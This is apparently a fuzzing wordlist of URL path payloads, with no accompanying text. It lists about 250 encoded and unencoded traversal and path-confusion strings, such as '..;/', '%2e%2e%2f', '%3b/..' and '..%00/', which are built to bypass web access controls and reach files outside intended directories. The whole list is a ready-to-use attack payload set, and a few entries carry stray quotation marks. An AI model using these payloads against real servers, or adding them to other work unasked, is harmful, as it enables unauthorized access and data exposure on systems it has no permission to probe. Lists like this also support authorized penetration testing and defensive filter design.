#?
%09
%09%3b
%09..
%09;
%20
%23%3f
%252f%252f
%252f/
%2e%2e
%2e%2e/
%2f
%2f%20%23 
%2f%23 
%2f%2f 
%2f%3b%2f 
%2f%3b%2f%2f 
%2f%3f 
%2f%3f/ 
%2f/ 
%3b 
%3b%09 
%3b%2f%2e%2e 
%3b%2f%2e%2e%2f%2e%2e%2f%2f 
%3b%2f%2e. 
%3b%2f.. 
%3b/%2e%2e/..%2f%2f 
%3b/%2e. 
%3b/%2f%2f../ 
%3b/.. 
%3b//%2f../ 
%3f%23 
%3f%3f 
.. 
..%00/; 
..%00;/ 
..%09 
..%0d/; 
..%0d;/ 
..%5c/ 
..%ff/; 
..%ff;/ 
..;%00/ 
..;%0d/ 
..;%ff/ 
..;\ 
..;\; 
..\; 
/%20# 
/%20%23 
/%252e%252e%252f/ 
/%252e%252e%253b/ 
/%252e%252f/ 
/%252e%253b/ 
/%252e/ 
/%252f 
/%2e%2e 
/%2e%2e%3b/ 
/%2e%2e/ 
/%2e%2f/ 
/%2e%3b/ 
/%2e%3b// 
/%2e/ 
/%2e// 
/%2f 
/%3b/ 
/.. 
/..%2f 
/..%2f..%2f 
/..%2f..%2f..%2f 
/../ 
/../../ 
/../../../ 
/../../..// 
/../..// 
/../..//../ 
/../..;/ 
/.././../ 
/../.;/../ 
/..// 
/..//../ 
/..//../../ 
/..//..;/ 
/../;/ 
/../;/../ 
/..;%2f 
/..;%2f..;%2f 
/..;%2f..;%2f..;%2f 
/..;/../ 
/..;/..;/ 
/..;// 
/..;//../ 
/..;//..;/ 
/..;/;/ 
/..;/;/..;/ 
/.// 
/.;/ 
/.;// 
//.. 
//../../ 
//..; 
//./ 
//.;/ 
///.. 
///../ 
///..// 
///..; 
///..;/ 
///..;// 
//;/ 
/;/ 
/;// 
/;x 
/;x/ 
/x/../ 
/x/..// 
/x/../;/ 
/x/..;/ 
/x/..;// 
/x/..;/;/ 
/x//../ 
/x//..;/ 
/x/;/../ 
/x/;/..;/ 
; 
;%09 
;%09.. 
;%09..; 
;%09; 
;%2F.. 
;%2f%2e%2e 
;%2f%2e%2e%2f%2e%2e%2f%2f 
;%2f%2f/../ 
;%2f.. 
;%2f..%2f%2e%2e%2f%2f 
;%2f..%2f..%2f%2f 
;%2f..%2f/ 
;%2f..%2f/..%2f 
;%2f..%2f/../ 
;%2f../%2f..%2f 
;%2f../%2f../ 
;%2f..//..%2f 
;%2f..//../ 
;%2f../// 
;%2f..///; 
;%2f..//;/ 
;%2f..//;/; 
;%2f../;// 
;%2f../;/;/ 
;%2f../;/;/; 
;%2f..;/// 
;%2f..;//;/ 
;%2f..;/;// 
;%2f/%2f../ 
;%2f//..%2f 
;%2f//../ 
;%2f//..;/ 
;%2f/;/../ 
;%2f/;/..;/ 
;%2f;//../ 
;%2f;/;/..;/ 
;/%2e%2e 
;/%2e%2e%2f%2f 
;/%2e%2e%2f/ 
;/%2e%2e/ 
;/%2e. 
;/%2f%2f../ 
;/%2f/..%2f 
;/%2f/../ 
;/.%2e 
;/.%2e/%2e%2e/%2f 
;/.. 
;/..%2f 
;/..%2f%2f../ 
;/..%2f..%2f 
;/..%2f/ 
;/..%2f// 
;/../ 
;/../%2f/ 
;/../../ 
;/../..// 
;/.././../ 
;/../.;/../ 
;/..// 
;/..//%2e%2e/ 
;/..//%2f 
;/..//../ 
;/../// 
;/../;/ 
;/../;/../ 
;/..; 
;/.;. 
;//%2f../ 
;//.. 
;//../../ 
;///.. 
;///../ 
;///..// 
;x 
;x/ 
;x; 
& : "
% 
%09 
../ 
../%2f 
.././ 
..%00/ 
..%0d/ "
..%5c 
..\ 
..%ff/ 
%2e%2e%2f 
.%2e/ 
%3f 
%26 
%23 
%2e 
/. 
? 
?? 
??? 
// 
/./ 
.//./ 
//?anything 
# 
/ 
/.randomstring 
..;/ 
.html 
%20/ 
.json 
\..\.\ 
/* 
./. 
/*/ 
/..;/ 
/%2e/ 
//. 
//// 
/../ 
